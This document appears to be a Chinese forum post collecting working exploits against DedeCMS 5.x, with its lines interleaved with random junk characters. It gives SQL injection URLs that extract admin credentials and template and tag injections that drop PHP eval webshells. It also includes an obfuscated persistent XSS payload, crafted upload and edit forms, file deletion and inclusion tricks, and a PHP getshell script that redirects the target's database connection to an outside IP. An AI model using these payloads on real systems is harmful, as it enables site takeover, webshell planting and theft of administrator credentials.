|
|
8 n( D7 Q# L- a7 c: uDedecms 5.6 rss注入漏洞, q( d) D$ f5 S; B
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1* d- _) s$ |6 z( r+ ~
5 ?2 o8 p" G% \( s9 i6 S9 q y! q E9 |: R9 M
0 m3 h; O" h/ Z1 h0 u$ K. b1 V
# G- W- b/ b! ?
7 Z+ x5 i& L( Z: O( G, [" k
0 Z: }. T: r; C n' L( g1 f
9 j0 m( c6 U- s' s
+ S9 [5 j! [! ~1 A6 d2 v9 y3 lDedeCms v5.6 嵌入恶意代码执行漏洞
% z+ P0 }# a, ~! |6 g. ^注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}5 b( Q/ r1 o* @- z9 Z" t, z0 K
发表后查看或修改即可执行
4 ~' |% p' Q; K! K( {9 ]a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}" p5 F# V6 H" b( i, {2 ]
生成x.php 密码xiao,直接生成一句话。
; |0 i- g U5 l) B7 I1 i8 _( s2 M5 @# k8 d. `# a; a
$ \8 {! Y [1 D. V# u& @7 n
" x; R) C$ e+ j/ h+ t, o+ \$ K$ d4 h b+ C1 {/ a* H& f0 h
; L" I# ?# Q, F6 [9 l
9 N( {1 U1 B; j; U; {) F, F
' B2 @' ^( @ v( p
4 Z7 c( J6 W0 e6 D. r7 Z( j( Z' a0 cDede 5.6 GBK SQL注入漏洞% i, x+ X: b2 w' Y f2 V3 P
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
- [" l1 y9 ~3 `' l5 E3 Xhttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe# a+ g# ^7 Y# R
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7( l! V- a/ q; f0 V
9 _6 L/ q* ^1 O2 ^* r, G5 N) u) j- O& d0 W4 g2 |; t
$ J- b/ P9 r/ _* \0 h/ h; e8 B
3 A! L/ B3 z2 M: `- K4 ^! d7 d8 a0 ?' e! W: X0 R2 k3 ^3 w( a
. G3 S8 e9 w. V, N4 ^ V% v: W( d
: \, _* @. l: o! z% W5 T6 v' G0 ~# f$ Q$ n! k
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
* b1 e3 j9 V$ t( H! W& Hhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` / d% _# b0 @8 F! N5 G; K6 b% y1 k
, d f5 G+ O/ c1 [3 S- s
3 @" D2 n" p3 S& k# c; h+ Y. c# r& q
5 u8 Y% z; R/ I- ?# o; k9 \
2 W4 h8 l y; k3 d, B- V5 T: c% e/ ` D* ~- y" w% a
DEDECMS 全版本 gotopage变量XSS漏洞
0 q% n: b9 O1 T2 d0 X# x1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
b4 v9 B; O" b' X- F2 P5 ahttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
5 ?4 l+ c- @' H
$ d. w% t4 Z. h! j0 J- I' U0 C4 O
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 5 s$ E6 M8 j" X% s8 F% z0 W! [$ r
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda7 V7 q" R* x* G; @6 x' H% U8 u
0 r3 L2 [* z2 _; S$ J) C) r9 ]) Y* N6 E% t) V5 u
http://v57.demo.dedecms.com/dede/login.php
4 C5 c- T! v6 l3 K# s) ^* o0 r4 ?2 T$ Q
# J5 m8 Y& N# N. Ccolor=Red]DeDeCMS(织梦)变量覆盖getshell
* c! W- p5 p! S#!usr/bin/php -w
5 G O0 s( n5 T/ |<?php" X8 ~* G. P* D2 O V* K/ u0 |) P8 N
error_reporting(E_ERROR);
& S% R9 l" n% g$ O4 lset_time_limit(0);
( s' s' ^1 R# S* ]print_r('+ J( x- I* x. A! V
DEDEcms Variable Coverage- O8 r2 W; \4 x% {) Q
Exploit Author: www.heixiaozi.comwww.webvul.com
. ? w. F' o& l);5 H* j- i. k7 r6 r+ h/ }
echo "\r\n";
0 w; t' B, A4 q2 Jif($argv[2]==null){1 y0 Q' n; Y: U0 j: ~
print_r('
, b: ?* {4 \2 L# m, L" a- y+---------------------------------------------------------------------------+* ]" |/ V- M, }9 X) l1 P s$ g
Usage: php '.$argv[0].' url aid path
& D0 ^' c' r+ _9 Haid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
' }& Z# ?7 Z6 d8 h% S) [6 wExample:
4 H2 b* z( z m" Jphp '.$argv[0].' www.site.com 1 old
- x9 @$ ]6 b* T2 D [+---------------------------------------------------------------------------+ |3 k* k$ j. }( t! l8 i' Y p% B
');
# S" l5 H: o. \* wexit;
/ Y3 o* ^* j, ?9 A! m. B% x- i}; G# W R; i n4 {9 n! L8 a ]
$url=$argv[1];$ f1 Z( d4 ~/ M0 T0 D
$aid=$argv[2];
' s$ s) o1 e! k2 ]6 t8 ^$path=$argv[3];" {2 z8 B$ M) c. Y" Z" R( |2 }7 H
$exp=Getshell($url,$aid,$path);2 n# I1 X* t( [6 ]
if (strpos($exp,"OK")>12){
- L8 B& k1 r3 Q/ X+ @3 Q' m I9 oecho "
- b! O7 y6 g$ o0 NExploit Success \n";( s! y9 V" ^' Y; C) m- M8 S
if($aid==1)echo "
% t* {1 i: D9 I/ k2 G; \Shell:".$url."/$path/data/cache/fuck.php\n" ;
" i( d. J& |8 E) d6 k
% J: y2 }6 `8 ?, i" ] \- E Q! z) C+ {- U# m; A* d
if($aid==2)echo "8 i+ t3 H$ m0 a2 O
Shell:".$url."/$path/fuck.php\n" ;
1 W- i; H- O5 U6 `' K9 T. h! t' |" E( j- b! x2 L( V
* D: N$ P/ ]: F8 O3 d% f4 y
if($aid==3)echo "8 Q! C5 J M- }. V- p; L
Shell:".$url."/$path/plus/fuck.php\n";
' @3 H% ?! s& e0 O
3 r. D, F: \8 }4 m& t9 c# t1 {. Q2 @
}else{; [+ V5 `' g: W Y% W0 f0 Z
echo "1 B, G( ] W4 \2 w" f9 ~) u
Exploit Failed \n";4 J% A. |; q( @' y. q. E. L
}
; P: I- z9 t+ T- o h! efunction Getshell($url,$aid,$path){. z/ l5 t+ f$ ^% {0 S& u
$id=$aid;8 Y$ d& a$ E2 `9 V$ `
$host=$url;
* ]# u- C# n& f3 u. g9 B$port="80";, r% _ e$ j: M* a
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";) I+ i \/ [/ o8 a% k+ k, }
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
/ A; d/ k x+ ?$data .= "Host: ".$host."\r\n";
' T- L3 d- f% i" l$ z+ B5 C6 s$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";1 a! Q2 ^7 ~" o/ ]+ u- z. y
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
2 i: M; b& U" I2 m& ?& k4 f! G- ]$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
2 M- L' }5 f: u+ Y L//$data .= "Accept-Encoding: gzip,deflate\r\n";% t* ]. W% p1 a
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";" |9 R8 {2 Y u9 x& P
$data .= "Connection: keep-alive\r\n";
! E) s+ Q6 K, v6 S4 E; g# P( F$data .= "Content-Type: application/x-www-form-urlencoded\r\n";$ o; J% R q N, N+ ^: t# @
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";7 L; T# l+ u8 G. M0 h8 n
$data .= $content."\r\n";6 y; P R `$ R% P6 ^) I9 C9 J$ Q
$ock=fsockopen($host,$port);( U: B5 }' {* n; o9 N- \! y9 ~
if (!$ock) {5 H& F2 _6 ~$ A) k
echo "1 ?, v. m, {2 |- L! h g' |
No response from ".$host."\n";
$ T; _3 j7 G' `0 q0 S; q' u}3 U# ~1 e: `6 L) ~1 ~
fwrite($ock,$data);
# v3 x3 T# Y/ o8 l. wwhile (!feof($ock)) {
# C' ^, p" c/ a& ]5 u$exp=fgets($ock, 1024);. C! z5 d! ]3 f8 T) G
return $exp;5 {7 S7 ^2 O+ q. `; f q
}
$ J0 u7 q4 Z2 s9 o& z9 q}
9 w* h7 E; C0 h3 A
7 c1 V7 {" k2 S% w. K9 W4 B6 R; e4 X* Z! H! w: \; ~
?>
' N; i4 D/ x9 ?, y0 E! Y/ g1 [0 W, E; c
( A( e2 R% c& ?( G( K1 B% E& d. r' N; Y* u: Q; Z
) R* I" x) h2 K$ N
4 [# _5 Z. C. A) ^0 Q' t+ p* b' b9 K. g, u( U3 r; T
) _; J6 v p: V7 G9 R8 G' f7 F5 w
, n. H; h+ J& T G% c/ R, H n, a5 `5 \4 u! s1 r/ v
# l+ Q! r- Y( `4 p. q
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
7 ~7 m) J9 c% r2 i* t$ O& F, thttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root' Z5 ]* D7 H2 R) F
1 @3 b+ N/ d" ~2 N1 m
1 V& ^) P9 F7 D7 W+ j% O
把上面validate=dcug改为当前的验证码,即可直接进入网站后台4 Y2 U0 Y/ J2 i$ _
" a3 o1 b! ?$ E2 F) ], x5 j4 O- e
' o+ J! n1 t: S" `# ]+ V k此漏洞的前提是必须得到后台路径才能实现, m* i! k1 n: W+ m" P4 n2 x/ q
( ^( ]8 P4 E0 d. V
. }; f3 }8 f% y; ]: A2 S# W& `# W9 o0 B- C
( M5 _6 S4 u l+ q. {/ {- t* V, l( n; J+ b, `. N: Z3 C
0 S+ J' j; C7 G% s* p7 i1 H: i& Q( G& q( c3 Z( f6 I* y2 g
. a7 F& l7 d7 n, d4 c# B- C+ _5 [% Y* r6 ^0 m7 V" J5 g# ?" b
9 o g8 h$ P$ `Dedecms织梦 标签远程文件写入漏洞
7 i- |1 M3 D# L6 W x% S9 y前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
3 l! G) x! c' f2 X
2 O s. s, T4 T: l$ \/ z& z; z
9 p* F: L- v& C再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 s. r+ H$ {) c) b
<form action="" method="post" name="QuickSearch" id="QuickSearch">
+ o+ w& Z) E5 i3 s<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />% F$ T. I5 w) P7 y/ J7 B
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
1 l7 J/ R$ R3 G8 [5 s' O; q<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
* K) L7 f* n& S1 J<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />6 a. F9 |9 C/ s2 G+ r
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />8 C% K3 Y( Q9 c* d7 W
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
& ~" r O: Q3 m" }( F7 _<input type="text" value="true" name="nocache" style="width:400">
0 H ^8 B: k4 [/ ^) b% ^<input type="submit" value="提交" name="QuickSearchBtn"><br />
# n0 @: h T" P- b% c# _</form>; D: T1 F4 R; @: b* e- M
<script>
8 h7 E0 G+ h$ [) `function addaction(); p, F+ L. }8 r B
{* ]( j7 B& i7 L2 G- Q$ z, b1 |
document.QuickSearch.action=document.QuickSearch.doaction.value;
5 }0 @7 c: O2 r4 O9 v3 z' U}
# i5 Y* R7 `" w: {0 F4 F</script>
6 }3 \* Z/ r! v. I- h" ]: c. @& o/ Z7 R! a7 K& C; i5 S/ N
& ` r. l J4 p3 E1 c3 j5 g9 R" U$ b. z$ X8 h
7 D/ V5 z3 P: }; M
6 u. ]5 V# Y3 I* W5 g C" E4 S7 y* @* a7 o7 h7 C" g
- f/ Q }0 K. ?$ m, x
* @! {0 [ q* K* l0 I" l' y0 v1 F! [& X6 f1 U
5 F( B, V. M7 o1 x( z
DedeCms v5.6 嵌入恶意代码执行漏洞
( p, x7 g+ t$ `% k; V. ^: j6 \# x注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行/ p4 d1 Y5 _1 h+ X& R, N6 O7 a# j
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
A* e' P$ L5 v+ D% p* m& J0 [生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
$ P4 i& r* j, {" U; x1 nDedecms <= V5.6 Final模板执行漏洞7 o' P8 @ g, ]3 a% U: @
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:1 o5 M4 G2 `' H [9 ~
uploads/userup/2/12OMX04-15A.jpg
0 x% V% A/ u0 b* {/ T% O/ u7 z' `# n
3 q9 V3 ~. o, q j) k模板内容是(如果限制图片格式,加gif89a):
( m, ]1 _- Z: b; p" K7 [{dede:name runphp='yes'}
6 a2 L, n# E- I; v9 ^! i$fp = @fopen("1.php", 'a');/ F3 J9 @0 C! \3 U
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
: k7 u, V: K5 z& B, K" W@fclose($fp);" j! U2 ?$ v7 D4 R4 g
{/dede:name}
* S( R! ^" i+ f7 Q* b- a6 y3 U2 修改刚刚发表的文章,查看源文件,构造一个表单:
! k6 c. v8 l9 ]# y<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">0 l4 n9 d5 k+ u8 \7 n
<input type="hidden" name="dopost" value="save" />
0 u4 H' k, l. o, W<input type="hidden" name="aid" value="2" />
3 v3 m, a D3 H, z' v<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
' z7 l; D* g$ C$ P& D<input type="hidden" name="channelid" value="1" />
; ~' o* O. E- ^/ x0 |% ?7 s<input type="hidden" name="oldlitpic" value="" />
6 A# g5 r7 F$ w( x- A7 n( y7 z<input type="hidden" name="sortrank" value="1275972263" />/ c, o) Y3 R4 F% l
% r4 F0 Y" ~8 c
/ n3 m i# P: S2 ?. U
<div id="mainCp">
" D, P9 ^1 x6 P+ O8 j& \2 t<h3 class="meTitle"><strong>修改文章</strong></h3>
5 r1 w$ u& c- e4 z8 p, N. Z0 L# V o: r" ]8 F2 A5 X
4 V* o7 a; O" l1 Q, u<div class="postForm">- R; O* T" A, t2 H7 i0 W9 c; i
<label>标题:</label>
) C: _ g* M- O( S6 ^<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>7 L0 @% X+ u: _' C, T9 I
& b p8 G7 t! o; [0 x' G# k3 P& }7 o& A B9 V0 v% k9 x
<label>标签TAG:</label>% q& q! r' h Y% N! L- }' {
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
' F! {8 [2 ?' ]8 w; J3 w
1 R( E# R* `7 ?1 Y
7 [( e& C3 n6 s' I$ T% J<label>作者:</label>. x: Y$ y5 \7 Z: L* ]! w/ u
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>3 `' ^& J( V- q0 X' W+ {
6 v2 Y0 {/ w8 `6 b
' X) e0 s0 ~! U/ `
<label>隶属栏目:</label># }' s$ L# V* `' Z- {; m( K% X$ g8 d
<select name='typeid' size='1'>* E6 X3 H7 C! Q2 E; y+ g2 W
<option value='1' class='option3' selected=''>测试栏目</option> n) w6 n, l; M+ M" ]7 [4 C1 F
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
7 s+ C) F. Z( l" P ^6 H3 ?# C! K! B( O
+ t: |* i; }* b i! B) i6 e7 x* u1 [0 E+ r r
<label>我的分类:</label>+ M4 j' Z! m% ?) S2 N, D4 v
<select name='mtypesid' size='1'>
/ {) d3 T+ ^/ b% B. ?<option value='0' selected>请选择分类...</option>4 x4 _4 K9 I/ N
<option value='1' class='option3' selected>hahahha</option>
) t4 c; V' \( r: v9 `( M</select>
1 b7 @) l) ?/ w; n5 b
. w7 a3 o, W6 Q. p9 ?; a& |0 z- O/ B* r1 v
<label>信息摘要:</label>) t$ b/ Y# o4 W5 y( ?% r: S
<textarea name="description" id="description">1111111</textarea>
- N! _0 g3 ?" i5 f6 f) g(内容的简要说明)6 l4 w" J ]! \/ O
$ W- h9 ]# {8 i: E% Y
3 T: h6 z. q+ q<label>缩略图:</label>
3 C6 v8 q- K3 M/ b6 m6 {0 F<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>8 r) |% i, n6 T
4 a: Z& b. p( E1 x
. o6 N( Z2 C1 z6 |) {9 v
<input type='text' name='templet'
( @) g4 t/ f0 d0 C8 ?value="../ uploads/userup/2/12OMX04-15A.jpg">
" ?* O0 w3 _1 S* K<input type='text' name='dede_addonfields'; N1 _4 k7 [7 \+ s' x/ ?
value="templet,htmltext;">(这里构造)
! O$ \! J# @$ M6 |, [</div>4 q. q7 }* c* o$ t$ }. F
( n2 O& U7 }) [
0 Y1 ?. T( Y) f1 D* O/ A! I ~9 n3 p
<!-- 表单操作区域 -->
$ a0 j4 V' I S7 z. |5 O* F<h3 class="meTitle">详细内容</h3># c, x( P# ]: K: s* E; ` ]: Y8 \
( D3 y& P* ]. Y: J7 g0 K- u5 \
! A6 ]9 o$ d! c( ] Y6 u# \<div class="contentShow postForm">1 k* y7 j; _' g! ^- b# q
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>3 i& J S9 k: N4 x V
* j' T( l( @5 p) }" E) Y: d" Q
5 S' W1 p9 y6 C$ _
<label>验证码:</label>
* {8 k: W& _ ]" a* Y<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
3 m8 W) l p5 m/ ~<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />9 x; F/ S# u1 K1 Q( S
% i3 U: G. o! d4 c( k" b( z
/ h: L4 O2 A& t' q. C) e9 t<button class="button2" type="submit">提交</button>
( V0 _2 a% D' G7 }+ h8 f# [5 x<button class="button2 ml10" type="reset">重置</button>
* v7 a/ a- T# C: ?: { [/ `</div>
8 Q" r6 @! I/ R8 e+ n) l4 d# n" ?) }" B' J, g. q
; { c# j' L# z# [, ~</div>
3 b. l! H# _1 N: X) e! ~& U3 O: u d4 v: s/ S7 m/ y. W
. v3 n, F9 W/ I- X2 Q. d8 I
</form>0 E4 `5 ?- b% g! m/ g
* ?- Y: y0 j' ^6 d
5 u5 u/ s1 K7 ^1 F$ O: s! {
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
}; H: Y/ Y4 b# H假设刚刚修改的文章的aid为2,则我们只需要访问:
2 r& Y/ q; O3 d4 h# ohttp://127.0.0.1/dede/plus/view.php?aid=2
9 ]+ w$ ^, d6 M: v( L5 {0 S即可以在plus目录下生成webshell:1.php. f' m; T& ?% @
$ K/ P, K, c$ J5 X8 D
6 P$ }! E$ y B
" Q% A2 N6 M8 [8 W' H6 I. j
3 |1 H# p6 E4 z( B. C# C" }
" V1 s `4 T( B, ?( d: R3 l) t' i& V, m
3 }1 A( ]+ W- {% |& O. L
, b) k1 c. s; H8 `2 @
2 h B: A1 k$ \. C0 o; s
2 E% o( x( C( P# f. |+ b' x
I* p# z6 f& y* s7 R" L) A) }) [& k L, i- o3 D
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
/ r6 G! h, ?6 W: n1 h# c* p( c, qGif89a{dede:field name='toby57' runphp='yes'}
; I- d/ L1 Z* q% f2 g" r" Kphpinfo();
) }, r7 V, C) x6 u' c& d{/dede:field}
# D, W% w, L5 ~# E# @. A保存为1.gif
9 R7 U8 j7 `+ Q; `8 L6 Z<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
0 s8 O! g& q+ G8 G+ Q: O- }% j0 `<input type="hidden" name="aid" value="7" />
& [( t- Y f: B<input type="hidden" name="mediatype" value="1" /> , ~& ]) V7 K: u3 G% o M
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> 3 X2 C$ z6 |# i. c5 d5 V
<input type="hidden" name="dopost" value="save" /> . [' [8 B9 e1 R% }9 `+ S' ~$ E3 }+ x4 j0 E
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
: H# d- C/ y' P<input name="addonfile" type="file" id="addonfile"/> % ]% `- S8 P! P0 `+ b3 T" ^
<button class="button2" type="submit" >更改</button>
9 t0 m! _$ f6 [1 L</form>
. w- x4 e3 F$ A g: z
, n( o1 {$ R! C' P: d; X, m
% C1 y. ?) O) y% F5 z) W构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
3 T* Z7 B3 [+ U/ n8 U发表文章,然后构造修改表单如下:
0 G: ~* G3 X; E$ Q1 Z# f: s# Q- @0 f ]! S% g' Y% [3 z$ ]
- \! J% l0 r# l2 J9 h4 `9 e<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> + V9 {6 d" I0 t3 ?$ T; e: |7 m
<input type="hidden" name="dopost" value="save" />
) l9 Z$ e4 R6 G" y% r- E! l<input type="hidden" name="aid" value="2" /> & K+ e* E! ?6 j9 H
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> ' ]% T2 M& ?' I( L! K/ v
<input type="hidden" name="channelid" value="1" />
& |. `; N3 j0 | _( z<input type="hidden" name="oldlitpic" value="" />
" F* E% a; m, _7 {2 A! ~<input type="hidden" name="sortrank" value="1282049150" /> / B- X2 q1 X1 q! y/ e) B# ~
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> + n6 b/ {9 z9 p# B9 p8 p) Z
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> 0 M# E# l+ H/ |
<select name='typeid' size='1'>
! O# r7 m E* ]8 Q9 e6 Y<option value='1' class='option3' selected=''>Test</option> ! ?- [8 k m/ e
<select name='mtypesid' size='1'> 9 P/ u% J! W V8 T" u. X
<option value='0' selected>请选择分类...</option>
5 L5 O2 ]* s' g K+ {<option value='1' class='option3' selected>aa</option></select> & @" s+ {5 G7 r( w, `' k$ R
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> 6 I4 m& A `" W' {0 @; i
<input type='hidden' name='dede_addonfields' value="templet"> ' n: N: @0 h3 J( B4 [9 \2 T
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
' o' ^* |/ @& k( b<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
. J( a4 N: m6 X+ X2 a' a% _<button class="button2" type="submit">提交</button> ; }6 c) v$ O; [0 P0 c' M
</form>
8 y8 m, R& `9 V6 C. x% y } X! O$ i( `
" J; p7 \# j6 m( B
' k j0 F" a, l- U
8 e, \' D+ z; Q' m; \! y& R- d; D: D7 s0 a$ Y
5 A* Y8 M5 j' `& A) g
; H5 z+ A" ^2 S0 Q8 X5 n
! [8 U4 m& N" Q1 R8 ~6 Z! g/ k& d
! M9 w" t+ p0 a! ~2 l9 _& ?1 P# j+ a5 x u
2 s( }* a% p9 E+ K) u- m% R" W
* J! Y3 j" d* E. ?4 `7 ~% Z3 M4 O, |2 e/ v# o
织梦(Dedecms)V5.6 远程文件删除漏洞# {5 u: P% d# P5 n a3 a
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
+ D1 g8 n% @* `% X% }* s4 H% ^# P- F/ |* g: P9 o5 K& g
* r/ o0 y! w7 P( ]% Y: ^4 s5 |0 F& S9 {4 I" u& I' {
, Y: X: r0 W2 U( l: O4 j8 c) j
" K! V3 S g4 W4 M3 l8 D/ ?
9 P6 @. H$ H7 t$ \) g5 w: g/ z* e! U. l8 w2 X
" W+ O' J! P: {6 d7 t
6 I s( r: z& d9 k8 }! p8 F( c8 {% ^! o; ]" B5 n
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
7 V% W* e1 p z! L! c: K, vhttp://www.test.com/plus/carbuya ... urn&code=../../
# V: ]* u; ]+ q/ f" j
( X$ W! ~, {& F* L. e- P+ C
( P! [5 Q [# A) c' h% d: _0 A
/ T$ ^$ f% W3 I* z- s2 G8 T* r/ E
, l( L3 s! d! h; W! N1 r4 m3 y1 z K5 U1 S% o2 t) |/ U/ H
' e z' o2 p8 n" D* v3 ]/ d/ u
# l; u1 S! V# `( V h( d3 u1 |$ Q8 s5 W$ r1 c1 v$ n4 ?
6 R' _, S6 P0 ]1 h) p+ b
3 n1 h; d0 n6 {4 K3 P. _( pDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 ; H* ^$ J' P7 z6 B1 w7 o4 N
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
3 B5 z% K: w0 ^) X6 G+ l密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD59 w/ D$ \5 o3 V- O s
+ }$ j+ a1 k; L- s1 z% }. _8 U o; v
- v3 z- p0 P1 E
{5 @& G7 N+ |% N7 ]& w, Q8 w+ q
7 C4 W/ }% c0 s6 \
! m, i6 Y, ?4 k; s: @
& T/ m G. K! _; W r; [/ G; d
) A1 X" L5 P$ p$ }( ?, n. x' ?" ^1 I; a& f' x
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞 C1 `4 [8 S! U9 e$ s
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
5 G" X) \+ b) J* R5 V: W* P0 f
/ ~; S7 K* K* k7 ^' L1 R# w# H! }2 C1 ~* w1 N
- p) E, O% }8 z: [8 ^
( B, U- X' x' T& Q8 e9 O. e5 [- i6 {' L+ L4 Q$ `0 j& m
6 V( v9 ?: O; o# q# e3 k/ E& W& E/ h! {& V8 t
0 R7 L/ S0 a/ N. M( ]/ C
9 O9 w5 A- B, Y
